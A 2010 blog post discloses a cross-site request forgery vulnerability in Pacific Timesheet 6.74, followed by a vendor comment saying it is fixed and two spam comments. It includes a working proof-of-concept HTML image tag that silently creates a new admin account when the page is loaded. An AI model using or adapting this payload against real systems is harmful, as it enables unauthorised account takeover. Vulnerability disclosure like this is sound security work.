This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, May 26, 2010

Pacific Timesheet 6.74 Cross-site Request Forgery

A cross-site request forgery vulnerability in Pacific Timesheet 6.74 can be exploited via GET request to create a new admin.

PoC
<html>
<body>
<img src="http://localhost/timesheet/user/user-set.do?userId=0&flag=&cloneId=&wizard-page=1&loginX=new_admin&passwordX=password&passwordConfirmX=password&firstName=&lastName=a&uid=&status=A&roleId=1&type=&policyId=1&jobTitle=&groupId=0&billRateId=0&billRate=&payRateId=0&payRate=&salary=&firstDay=5%2F22%2F2010&lastDay=&scheduledDay%5B1%5D=on&scheduledDay%5B2%5D=on&scheduledDay%5B3%5D=on&scheduledDay%5B4%5D=on&scheduledDay%5B5%5D=on&scheduledHours=&scheduledHoursPerDay=&scheduledIn=&scheduledOut=&email=&phone=&mobile=&fax=&timeSheetId=1&carryForward=1&timeFormat=0&locale=en_US&timeZone=America%2FNew_York&apprv0Id=0&apprv0bId=0" />
</body>
</html>

3 comments:

  1. This has been fixed in Pacific Timesheet 6.74 Build 363. Please contact support@pacifictimesheet.com for download information.

    ReplyDelete
  2. I was looking for a good article about project management, increasing my firm’s turnover , overall effectiveness and how to run them effeciently by implementing time management systems like that of timesheet ...Nice article ...It is always better to spend some good time reading on a good article Your's is one among that…. great work..GO ahead..

    ReplyDelete
  3. Thank you for the info. It sounds pretty user friendly. I guess I’ll pick one up for fun. thank u
    Timesheet Management System

    ReplyDelete